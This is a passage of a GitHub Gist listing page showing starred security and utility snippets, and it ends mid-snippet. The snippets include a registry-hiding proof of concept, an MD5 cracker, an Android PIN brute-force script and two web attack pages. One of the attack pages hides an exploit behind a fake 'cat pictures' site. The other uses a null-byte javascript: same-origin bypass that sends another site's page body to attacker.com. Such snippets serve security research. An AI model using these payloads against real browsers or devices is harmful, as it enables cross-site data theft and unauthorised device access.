Skip to content

Instantly share code, notes, and snippets.

View yehgdotnet's full-sized avatar

Aung Khant yehgdotnet

91 followers · 204 following
View GitHub Profile
@jtuberville
jtuberville / ElasticEmailClient.java
Created May 11, 2012 01:39
How to urlencode using HttpClient
public static String sendViaHttpClient(String userName, String apiKey, String from, String fromName, String subject, String body, String to) {
NameValuePair[] data = {
new BasicNameValuePair("userName", userName),
new BasicNameValuePair("api_key", apiKey),
new BasicNameValuePair("from", from),
new BasicNameValuePair("from_name", fromName),
new BasicNameValuePair("subject", subject),
new BasicNameValuePair("body_html", body),
new BasicNameValuePair("to", to)
@Graph-X
Graph-X / ironregistry.py
Last active October 1, 2019 16:46
PoC for hiding things in the registry. My testing hasn't returned any errors when viewing in regedit
from Microsoft.Win32 import Registry
from time import sleep
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
rkey.SetValue(u'\x00 this is a test',u'\x00look at me!')
rkey.Close()
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
values = rkey.GetValueNames()
print("We have {0} values.".format(str(len(values))))
print("The value names returned are: {0}.".format(values[0]))
value = rkey.GetValue(u'\x00 this is a test')
@rwincey
rwincey / http_screenshot.py
Created February 26, 2019 15:31
Website screenshot
# Author: b0yd @rwincey
# Website: securifera.com
#
# Setup:
# -------------------------------------------------
# pip install selenium
# wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
# google-chrome-stable --version
# Vist http://chromedriver.chromium.org/downloads to identity the right version
# wget https://chromedriver.storage.googleapis.com/72.0.3626.69/chromedriver_linux64.zip
@mritunjay-k
mritunjay-k / whats_ur_status.py
Last active November 24, 2019 02:31
Provide it a list of domains and it will show you which of them is 200 OK or 404 NOT FOUND (extremly helpful for web application bug hunting)
#!/usr/bin/env python
import requests
try:
read_file = open(input("Enter path of the file containing subdomains: "),'r')
for host in read_file:
domain = host.rstrip("\n")
try:
@limitedmage
limitedmage / cracker.js
Created November 28, 2010 06:01
MD5 Cracker in JavaScript (free under http://j.mp/ms-pl )
// Global variables
var word, count, time, status; // search status
var running; // should status be updated?
var showPause, showResume, showStop; // to show or hide buttons
var worker; // main WebWorker
$(document).ready(function () {
// Update DOM every 500 ms
setInterval("updateDom()", 500);
@szski
szski / GraphQL-Introspection-Query-Url-Encoded
Created October 6, 2019 20:17
Append this string after https://examplegqlapi.com/?query= to test for introspection query
query%20IntrospectionQuery%20%7B%0A%20%20%20%20__schema%20%7B%0A%20%20%20%20%20%20queryType%20%7B%20name%20%7D%0A%20%20%20%20%20%20mutationType%20%7B%20name%20%7D%0A%20%20%20%20%20%20types%20%7B%0A%20%20%20%20%20%20%20%20...FullType%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20directives%20%7B%0A%20%20%20%20%20%20%20%20name%0A%20%20%20%20%20%20%20%20description%0A%20%20%20%20%20%20%20%20locations%0A%20%20%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%7D%0A%20%20fragment%20FullType%20on%20__Type%20%7B%0A%20%20%20%20kind%0A%20%20%20%20name%0A%20%20%20%20description%0A%20%20%20%20fields%28includeDeprecated%3A%20true%29%20%7B%0A%20%20%20%20%20%20name%0A%20%20%20%20%20%20description%0A%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20type%20%7B%0A%20%20%20%20%20%20%20%20...TypeRef%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20isDeprecated%0A%20%20%
@joswr1ght
joswr1ght / catchredir.m
Last active June 8, 2021 11:50
Demonstration code to detect runtime method swizzling with Cydia Substrate/Cycript.
// Compile with:
// clang catchredir.m -o catchredir -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7 -framework Foundation
#import <Foundation/Foundation.h>
#import <stdio.h>
#import <objc/runtime.h>
@interface UrlConnection : NSObject
@property (strong) NSString *url;
- (void)connect;
@end
@joswr1ght
joswr1ght / rduck-pinbrute.py
Created April 19, 2016 10:51
#!/usr/bin/env python
# rduck-pinbrute: Generate Duckyscript file that brute forces all 4-digit
# PIN values for use in attacking Android devices. Prioritizes common
# PIN values before resorting to exhaustive 0000-9999 search.
# Joshua Wright, josh@willhackforsushi.com. Public Domain.
#
# Inspired by Darren Kitchen script:
# https://forums.hak5.org/index.php?/topic/28165-payload-android-brute-force-4-digit-pin/
# Data Genetics high probability list
@joswr1ght
joswr1ght / MetasploitSOPBypass.html
Created January 12, 2015 21:45
<html><head><script src="Spec.js/lib/Spec.js"></script></head>
<body>
This is a normal website. Look at these pictures of cats...
<script>
var spec = new Spec();
if (spec.isDeviceDetected() && spec.getOS() == "Android"
&& spec.getBrowser != "Chrome"
&& parseFloat(spec.getOSVersion()) < 4.4) {
var iframe = document.createElement('iframe');
iframe.style.display="none";
@joswr1ght
joswr1ght / AndroidSOPBypass.html
Created January 12, 2015 21:37
<html><head></head>
<body>
This is just a normal website...
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
<script>
document.getElementById("if").style.visibility="hidden";
window.open("\u0000javascript:
var i=new Image();
i.src='http://attacker.com/save.php?'+document.body.innerHTML;
document.body.appendChild(i);